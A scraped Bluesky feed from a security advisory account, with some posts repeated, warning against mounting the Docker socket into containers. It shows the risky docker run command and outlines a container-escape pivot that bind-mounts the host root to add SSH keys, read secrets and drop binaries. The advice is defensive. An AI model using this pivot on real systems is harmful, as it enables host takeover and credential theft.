ReynardSec
@reynardsec.bsky.social
Your Cybersecurity Advisor - https://reynardsec.com/en/
ItSec (walking by): You pay for updates & support, probably, but you can do some of this yourselves with a bit of k8s hacking.
devops0: How, exactly?
👉 infosec.exchange/@reynardsec/...
devops0: How, exactly?
👉 infosec.exchange/@reynardsec/...
ReynardSec (@reynardsec@infosec.exchange)
Attached: 1 image
A grumpy ItSec guy walks through the office when he overhears an exchange of words.
devops0: These k8s security SaaS prices are wild.
devops1: Image scanning, policy engines, "ente...
infosec.exchange
September 2, 2025 at 7:06 AM
ItSec (walking by): You pay for updates & support, probably, but you can do some of this yourselves with a bit of k8s hacking.
devops0: How, exactly?
👉 infosec.exchange/@reynardsec/...
devops0: How, exactly?
👉 infosec.exchange/@reynardsec/...
How the pivot works (example): From the compromised container, talk to docker.sock and create a helper container that bind-mounts the host root at /host (rw). Then start it. Now you can operate on /host: add SSH keys, read secrets, drop binaries, even chroot. All via REST API using simple curl calls
August 27, 2025 at 6:29 PM
How the pivot works (example): From the compromised container, talk to docker.sock and create a helper container that bind-mounts the host root at /host (rw). Then start it. Now you can operate on /host: add SSH keys, read secrets, drop binaries, even chroot. All via REST API using simple curl calls
Dangerous pattern:
docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu:24.04
This gives the container full control of the Docker daemon. If an attacker gets code exec (RCE, deserialization, etc), they can pivot from that container to the Docker host. Please do not do this.!
docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu:24.04
This gives the container full control of the Docker daemon. If an attacker gets code exec (RCE, deserialization, etc), they can pivot from that container to the Docker host. Please do not do this.!
August 27, 2025 at 6:29 PM
Dangerous pattern:
docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu:24.04
This gives the container full control of the Docker daemon. If an attacker gets code exec (RCE, deserialization, etc), they can pivot from that container to the Docker host. Please do not do this.!
docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu:24.04
This gives the container full control of the Docker daemon. If an attacker gets code exec (RCE, deserialization, etc), they can pivot from that container to the Docker host. Please do not do this.!
Why it matters: The Docker CLI talks to the Docker daemon over a UNIX socket (/var/run/docker.sock). That socket exposes the Docker Engine REST API. With it, you can list, start, stop, create, or reconfigure containers - effectively controlling the host via the daemon. That's the oops pattern.
August 27, 2025 at 6:28 PM
Why it matters: The Docker CLI talks to the Docker daemon over a UNIX socket (/var/run/docker.sock). That socket exposes the Docker Engine REST API. With it, you can list, start, stop, create, or reconfigure containers - effectively controlling the host via the daemon. That's the oops pattern.
ItSec: Quick test - if curl to docker.sock returns JSON, you've handed admin of Docker daemon. Please don't do that; it's root-by-proxy...
August 27, 2025 at 6:28 PM
ItSec: Quick test - if curl to docker.sock returns JSON, you've handed admin of Docker daemon. Please don't do that; it's root-by-proxy...
There is even more: for example, as a bonus, in point 001 there’s an interesting analysis concerning the incorrect configuration of PCR banks of the disk encryption process using LUKS.
August 25, 2025 at 1:27 PM
There is even more: for example, as a bonus, in point 001 there’s an interesting analysis concerning the incorrect configuration of PCR banks of the disk encryption process using LUKS.
2) Part2: leftarcode.com/posts/afd-re...
3) Part3: leftarcode.com/posts/afd-re...
4) Part 4: leftarcode.com/posts/afd-re...
3) Part3: leftarcode.com/posts/afd-re...
4) Part 4: leftarcode.com/posts/afd-re...
August 20, 2025 at 1:35 PM
2) Part2: leftarcode.com/posts/afd-re...
3) Part3: leftarcode.com/posts/afd-re...
4) Part 4: leftarcode.com/posts/afd-re...
3) Part3: leftarcode.com/posts/afd-re...
4) Part 4: leftarcode.com/posts/afd-re...